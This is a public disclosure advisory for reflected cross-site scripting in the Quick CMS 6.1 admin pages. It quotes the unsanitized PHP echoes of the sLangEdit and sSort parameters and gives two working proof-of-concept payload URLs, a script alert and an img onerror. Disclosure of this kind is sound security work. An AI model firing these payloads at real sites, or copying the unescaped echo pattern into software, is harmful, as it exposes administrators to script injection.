## FULL DISCLOSURE #Product : Quick CMS #Exploit Author : Rahul Pratap Singh #Version : 6.1 #Home page Link : http://opensolution.org/home.html #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 19/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "sLangEdit" and "sSort" parameters are not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: languages.php Found at line:23 <h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? ' '.$_GET['sLangEdit'] : null ); ?></h1> File Name: pages.php Found at line:49 <form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo '&amp;sSort='.$_GET['sSort']; ?>" name="form" method="post" class="main-form"> ---------------------------------------- Exploit: ---------------------------------------- localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1> localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!-- ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png Disclosure Timeline: Tried to contact vendor via email : 14/1/2016 ( email bounce back) Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response) Public Disclosure: 19/1/2016 Pub ref: https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability